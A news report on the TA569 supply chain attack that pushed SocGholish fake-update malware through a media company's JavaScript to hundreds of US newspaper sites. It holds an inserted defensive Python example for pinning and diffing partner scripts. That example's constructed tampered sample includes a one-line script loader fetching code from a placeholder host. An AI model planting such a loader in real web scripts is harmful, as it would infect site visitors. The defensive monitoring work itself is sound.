Hundreds of US news sites spread malware in supply chain attacks


Threat actors are using the compromised infrastructure of an unnamed media company to deploy the SocGholish (aka FakeUpdates) JavaScript malware framework on the websites of hundreds of newspapers in the United States.

“The media company in question is a company that provides both video content and advertising to major news outlets. [It] serves many different companies in different markets across the United States,” Sherrod DeGrippo, vice president of threat research and detection at Proofpoint, told BleepingComputer.

The threat actor behind this supply chain attack (tracked by Proofpoint as TA569) injected malicious code into a harmless JavaScript file that is loaded by news outlet websites.

This malicious JavaScript file is used to install SocGholish, which infects visitors to the compromised websites with malware payloads disguised as fake browser updates, delivered as ZIP archives (e.g. Opera.Update.zip) via fake update alerts.

“Proofpoint Threat Research observed intermittent injections at a media company that supplies many major news outlets. This media company serves content to its partners via JavaScript,” Proofpoint’s Threat Insight team revealed today in a Twitter thread.

“By changing the codebase of this otherwise benign JS, it is now used to deploy SocGholish.”

Malicious JavaScript file obfuscated content (BleepingComputer)
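The defensive check a news site operator would want against this kind of partner-script tampering is to pin the hash of each third-party JavaScript file it embeds and re-verify it on every fetch, reporting what changed when it no longer matches. The Python below is an added example, not code from Proofpoint, BleepingComputer or the media company involved; the `BASELINE_JS` and `INJECTED_JS` samples are constructed stand-ins for the benign partner script and a tampered copy, and `audit` is a hypothetical helper. It also derives the `integrity=` value used by Subresource Integrity for scripts that can be pinned in the page.

```python
import base64
import difflib
import hashlib

# Constructed sample: known-good copy of a script a content partner serves to
# news sites (stand-in for the benign JS the article describes).
BASELINE_JS = (
    b"/* partner video widget */\n"
    b"window.loadPlayer = function (id) { renderWidget(id); };\n"
)

# Constructed sample: the same file with an extra loader appended, mimicking the
# shape of an injection (a harmless placeholder host; no real payload).
INJECTED_JS = BASELINE_JS + (
    b"(function(){var s=document.createElement('script');"
    b"s.src='https://stage.example.invalid/u.js';document.head.appendChild(s);})();\n"
)


def sri_value(body: bytes, algo: str = "sha384") -> str:
    """Value for an HTML integrity= attribute, e.g. 'sha384-<base64 digest>'."""
    digest = hashlib.new(algo, body).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def matches_baseline(body: bytes, expected_sri: str) -> bool:
    """True when the fetched body hashes to the pinned integrity value."""
    algo, _, _ = expected_sri.partition("-")
    return sri_value(body, algo) == expected_sri


def diff_against_baseline(baseline: bytes, body: bytes) -> list[str]:
    """Lines present in the fetched copy but not in the baseline (for triage)."""
    old = baseline.decode("utf-8", "replace").splitlines()
    new = body.decode("utf-8", "replace").splitlines()
    return [ln[2:] for ln in difflib.ndiff(old, new) if ln.startswith("+ ")]


def audit(baseline: bytes, fetched: bytes) -> dict:
    """Re-check a partner script against its pinned hash and report added lines."""
    pinned = sri_value(baseline)
    ok = matches_baseline(fetched, pinned)
    return {"pinned": pinned, "ok": ok,
            "added": [] if ok else diff_against_baseline(baseline, fetched)}


if __name__ == "__main__":
    report = audit(BASELINE_JS, INJECTED_JS)
    print("OK" if report["ok"] else "CHANGED; added lines:")
    for line in report["added"]:
        print("  +", line)
```

Pinning only works for partner scripts whose bytes are stable between fetches; for ad or video content that legitimately varies per request, the same hash-and-diff check still works as a server-side monitor run against a copy the partner has confirmed as current.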

In total, the malware was installed on websites of more than 250 US news outlets, some of which are major news organizations, according to security researchers from corporate security firm Proofpoint.

While the total number of affected news organizations is currently unknown, Proofpoint says it is aware of affected media organizations (including national news outlets) from New York, Boston, Chicago, Miami, Washington, DC, and others.

“TA569 has previously used media resources to spread SocGholish, and this malware can lead to secondary infections, including potential ransomware,” DeGrippo also told BleepingComputer.

“The situation needs to be closely monitored as Proofpoint has observed TA569 re-infecting the same assets just days after remediation.”

Link to ransomware attacks

Proofpoint has previously observed SocGholish campaigns that used fake updates and website redirects to infect users, including in some cases ransomware payloads.

Cybercrime gang Evil Corp also used SocGholish in a very similar campaign to infect the employees of more than 30 large US private companies via fake software update alerts sent through dozens of compromised US newspaper websites.

The infected computers were later used as a springboard into employers’ corporate networks in attacks attempting to deploy the gang’s WastedLocker ransomware.

Fortunately, Symantec revealed in a report that it blocked Evil Corp’s attempts to encrypt the breached networks in attacks targeting several private companies, including 30 US companies, eight of them Fortune 500 companies.

SocGholish was also recently used to backdoor networks already infected with the Raspberry Robin malware, in what Microsoft described as Evil Corp’s pre-ransomware behavior.

Update Nov. 2 6:22 p.m. EDT: Added Proofpoint statement.

